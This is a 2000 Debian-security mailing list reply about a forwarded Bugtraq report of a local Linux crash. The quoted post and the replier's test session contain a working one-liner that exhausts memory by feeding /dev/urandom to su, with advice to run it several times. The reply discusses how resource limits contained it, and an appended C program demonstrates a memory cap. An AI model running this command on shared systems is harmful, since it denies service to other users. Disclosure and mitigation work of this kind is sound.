On Fri, Mar 24, 2000 at 09:38:33PM -0700, Nathan Paul Simons wrote:
> Has anyone else seen this? i tested it with the latest shellutils
> from the frozen dist, and it appears to work. It should also be noted
> that i tested this on my alpha box (running RedHat 6.1) and it didn't do
> anything except give an error message. The version included with RedHat
> 6.1 is sh-utils 2.0. i haven't looked yet but, i'm willing to bet that
> this was already noticed and fixed and people (including distro
> maintainers) just need to upgrade.

I just tried this on my powerpc box (blue G3 400) with current frozen
and it did not crash my system. I ran this command twice on two VCs;
they ran for a while and slowed stuff down a little (noticeable if i say,
did ls -l /usr/bin) but after a minute or so bash killed the processes:

[eb@socrates eb]$ su `cat /dev/urandom` > /dev/null |< su `cat /dev/urandom`&
[1] 7080
[eb@socrates eb]$ bash: xrealloc: cannot reallocate 16777216 bytes (0 bytes allocated)
bash: xrealloc: cannot reallocate 16777216 bytes (0 bytes allocated)

[1]+  Exit 2                  su `cat /dev/urandom` >/dev/null | `cat /dev/urandom` <su
[eb@socrates eb]$

perhaps this is because i have resource limits set?

[eb@socrates eb]$ ulimit -a
core file size (blocks)     1000000
data seg size (kbytes)      102400
file size (blocks)          unlimited
max locked memory (kbytes)  5120
max memory size (kbytes)    46080
open files                  256
pipe size (512 bytes)       8
stack size (kbytes)         8192
cpu time (seconds)          63072000
max user processes          100
virtual memory (kbytes)     51200
[eb@socrates eb]$

this system has 128 MB of real ram and a 96MB swap partition.

as for redhat i think they use GNU su do they not? we (and presumably
slack) are using the simple shadow su (why?).

> ----- Forwarded message from Javor Ninov <javor@multigroup-bg.com> -----
>
> Approved-By: aleph1@SECURITYFOCUS.COM
> Delivered-To: bugtraq@lists.securityfocus.com
> Delivered-To: bugtraq@securityfocus.com
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-Mailer: Microsoft Outlook Express 5.00.2919.6600
> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
> Date:         Fri, 24 Mar 2000 18:42:03 +0200
> Reply-To: Javor Ninov <javor@multigroup-bg.com>
> From: Javor Ninov <javor@multigroup-bg.com>
> Subject:      Local Linux Crash
> X-To:         bugtraq <bugtraq@securityfocus.com>
> To: BUGTRAQ@SECURITYFOCUS.COM
>
> Tested on SlackWare 7.0 2.2.14
> After short time this will crash Linux box:
> su `cat /dev/urandom` > /dev/null |< su `cat /dev/urandom`&
>
> for a better effect start it several times :-))
> This can be done by any regular user !
>
> ----- End forwarded message -----
>
> Nathan Paul Simons
> http://www.nmt.edu/~npsimons/
>
>
>
> --
> To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>

--
Ethan Benson
http://www.alaska.net/~erbenson/
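
The resource-limit question raised in the message above, as an added example that is not part of the original post: a C program that runs a child under an address-space cap (RLIMIT_AS, the limit `ulimit -v` sets) and shows its buffer growth being refused instead of consuming system memory. The function names, the 256 MiB stop value and the child's exit code 2 are choices made for this illustration; the 51200 KB cap is the "virtual memory" value from the `ulimit -a` output.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

/* Child: apply the cap, then double a buffer until realloc is refused. */
static void grow_under_cap(rlim_t cap, size_t stop_at, int report_fd)
{
    struct rlimit rl = { cap, cap };            /* soft and hard limit */
    size_t held = 0, want = (size_t)1 << 20;    /* start at 1 MiB */
    char *buf = NULL;
    if (setrlimit(RLIMIT_AS, &rl) != 0) _exit(3);
    while (want <= stop_at) {
        char *bigger = realloc(buf, want);
        if (bigger == NULL) break;              /* ENOMEM: the cap held */
        buf = bigger;
        memset(buf + held, 0xA5, want - held);  /* touch the new pages */
        held = want;
        want *= 2;
    }
    if (write(report_fd, &held, sizeof held) != (ssize_t)sizeof held) _exit(3);
    _exit(held < stop_at ? 2 : 0);              /* 2 = refused by the cap */
}

/* Parent: returns bytes the child held (-1 on setup failure); *refused is 1
   when the cap, not stop_at, ended the growth. The caller is never capped. */
long long capped_growth(rlim_t cap, size_t stop_at, int *refused)
{
    int fds[2], status = 0;
    size_t held = 0;
    pid_t pid;
    if (pipe(fds) != 0 || (pid = fork()) < 0) return -1;
    if (pid == 0)
        grow_under_cap(cap, stop_at, fds[1]);   /* never returns */
    close(fds[1]);
    if (read(fds[0], &held, sizeof held) != (ssize_t)sizeof held) held = 0;
    close(fds[0]);
    waitpid(pid, &status, 0);
    *refused = WIFEXITED(status) && WEXITSTATUS(status) == 2;
    return (long long)held;
}

int main(void)
{
    int refused = 0;   /* cap below: 51200 KB, as in the ulimit -a output */
    long long held = capped_growth((rlim_t)51200 * 1024, (size_t)256 << 20, &refused);
    printf("child held %lld bytes, refused=%d\n", held, refused);
    return 0;
}
```

A process that stays under the cap is unaffected; only the allocation that would cross it fails, and the failure is confined to that process.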